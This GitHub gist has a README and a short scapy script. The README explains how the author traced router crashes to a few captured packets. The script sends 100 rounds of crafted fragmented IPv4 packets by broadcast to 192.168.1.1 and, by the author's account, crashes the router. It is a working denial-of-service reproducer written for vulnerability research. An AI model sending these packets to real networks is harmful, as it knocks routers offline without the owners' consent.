Skip to content

Instantly share code, notes, and snippets.

@mmkhitaryan

mmkhitaryan/README.md

Last active December 7, 2023 18:25
Show Gist options
  • Save mmkhitaryan/2ce90d542e80478c2640a4a2262a3f53 to your computer and use it in GitHub Desktop.
Save mmkhitaryan/2ce90d542e80478c2640a4a2262a3f53 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
README.md

My router has been crashing when my PC boots, and starts working good after 5 minutes of restart. So I decided to dig into reasons of the crash.

I used tcpdump and made it start on system boot. It collected all the packets, and then used tcpdump replay to try to reproduce the crashes.

When I replayed all the packets, the router crashed as suspected. But I needed to understand what specific packets were the reason of the crashing.

So I started cutting the file in half, (basically binary search) and seeing if the crash happens on. I ended up with ~20 packets, and then choose those packets that are on the scapy script.

I wanted to continue the research of the reasons of the vulnerability, emulate the router firmware and try to crash it. But I did not find router's working firmware anywhere.

Raw
kdeconnect.py
from scapy.all import *
for _ in range(100):
first_new_packet = Ether(
dst = "ff:ff:ff:ff:ff:ff", # works only with broadcast mac address
src = "70:85:c2:70:ce:0c",
type = "IPv4"
)/IP(
version = 4,
id = 333,
flags = 'MF',
frag = 0,
proto = "udp",
src = "192.168.1.113",
dst = "192.168.1.1",
)/Raw(
load = 1472 * 'a'
)
sendp(first_new_packet)
new_second_packet = Ether(
dst = "ff:ff:ff:ff:ff:ff", # works only with broadcast mac address
src = "70:85:c2:70:ce:0c",
type = "IPv4"
)/IP(
version=4,
id=333,
frag=184,
proto="udp",
src="192.168.1.113",
dst="192.168.1.1"
)/Raw(
load=1 * 'b'
)
sendp(new_second_packet)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment